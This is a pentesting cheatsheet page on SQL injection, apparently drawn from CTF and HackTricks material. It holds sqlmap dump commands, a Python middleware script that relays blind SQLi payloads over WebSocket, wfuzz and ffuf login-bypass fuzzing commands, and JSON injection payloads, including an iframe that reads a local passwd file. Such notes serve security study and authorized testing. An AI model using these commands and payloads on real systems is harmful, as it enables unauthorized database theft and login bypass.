Articles

SQL Injection

Table of Content

Cheatsheets

SQLMaps

SQLMap can be used to detect SQL Injection.

sqlmap -u "http://<URL>/" --batch --dump --forms

SQLMap Level

  • level 1: By default

  • level 2: Test HTTP Cookie header

  • level 3: Test HTTP User-Agent/Referer headers

Automating Blind SQL injection over WebSocket with SQLMap

Here is a script that allows blind SQL Injection using SQLMap. It start a middleware server that basically:

  • Format the payload if needed (for example wrap it in a JSON format)

  • Create a WebSocket connection to actual target, receive response and extract any token if needed.

  • Send SQLi payload and receive Output from WebSocket.

  • Display the output as response

from http.server import SimpleHTTPRequestHandler
from socketserver import TCPServer
from urllib.parse import unquote, urlparse
from websocket import create_connection

ws_server = "ws://localhost:8156/ws"

def send_ws(payload):
	ws = create_connection(ws_server)
	# If the server returns a response on connect, use below line	
	#resp = ws.recv() # If server returns something like a token on connect you can find and extract from here
	
	# For our case, format the payload in JSON
	message = unquote(payload).replace('"','\'') # replacing " with ' to avoid breaking JSON structure
	data = '{"employeeID":"%s"}' % message

	ws.send(data)
	resp = ws.recv()
	ws.close()

	if resp:
		return resp
	else:
		return ''

def middleware_server(host_port,content_type="text/plain"):

	class CustomHandler(SimpleHTTPRequestHandler):
		def do_GET(self) -> None:
			self.send_response(200)
			try:
				payload = urlparse(self.path).query.split('=',1)[1]
			except IndexError:
				payload = False
				
			if payload:
				content = send_ws(payload)
			else:
				content = 'No parameters specified!'

			self.send_header("Content-type", content_type)
			self.end_headers()
			self.wfile.write(content.encode())
			return

	class _TCPServer(TCPServer):
		allow_reuse_address = True

	httpd = _TCPServer(host_port, CustomHandler)
	httpd.serve_forever()


print("[+] Starting MiddleWare Server")
print("[+] Send payloads in http://localhost:8081/?id=*")

try:
	middleware_server(('0.0.0.0',8081))
except KeyboardInterrupt:
	pass

Start the server then run SQLMap with the port set on the script.

sqlmap -u "http://localhost:8081/?id=1" --batch --dbs

More information at https://rayhan0x01.github.io/ctf/2021/04/02/blind-sqli-over-websocket-automation.html

SQLmap Cheatsheet

Hacktricks: https://book.hacktricks.xyz/pentesting-web/sql-injection/sqlmap

Login forms

Techniques and tools used to bypass login forms using SQL Injection. The wordlist can be found here. It is taken from HackTricks.

SQL Login Bypass

Hacktricks

PayloadsAllTheThings

NoSQL Login Bypass

Hacktricks

Using wfuzz

Keyword FUZZ is used to determine the parameter that will be used.

wfuzz -c -z file,sqli.req -d "username=FUZZ&password=pass" -u "http://<IP>/login"

Useful options

  • -H: Used to set custom header

  • --hc/hl/hw/hh: Hide responses with the specified code/lines/words/chars

  • --sc/sl/sw/sh: Show responses with the specified code/lines/words/chars

  • -d: request datas

Using ffuf

ffuf -u http://<URL>/login -c -w sqli.req -X POST -d 'username=adminFUZZ&password=admin' -H 'Content-Type: application/x-www-form-urlencoded'

Useful options

  • -H: Used to set custom header

  • -d: request datas

Using SQLmap

Load a file with -r option.

sqlmap -r sqli.req -u "http://<URL>/login" --data "username=admin&password=pass"

Json injection

  1. Replace content-type: Content-Type: application/json

  2. Send json payload: https://book.hacktricks.xyz/pentesting-web/nosql-injection#basic-authentication-bypass

Any forms

Json injection

"user":"<a href='http\\\\:someurl.com'>ACTIVATE USER HERE</a>"
"user":"<img src=https\\://dummyimage.com/200x200/ff00d5&text=HAHAHA/>"
"title":"<iframe src=file:///ect/passwd height=800px width=600px></iframe>"

JSON Injection: https://lisandre.com/archives/2286

PreviousCSV InjectionNextSSTI

Last updated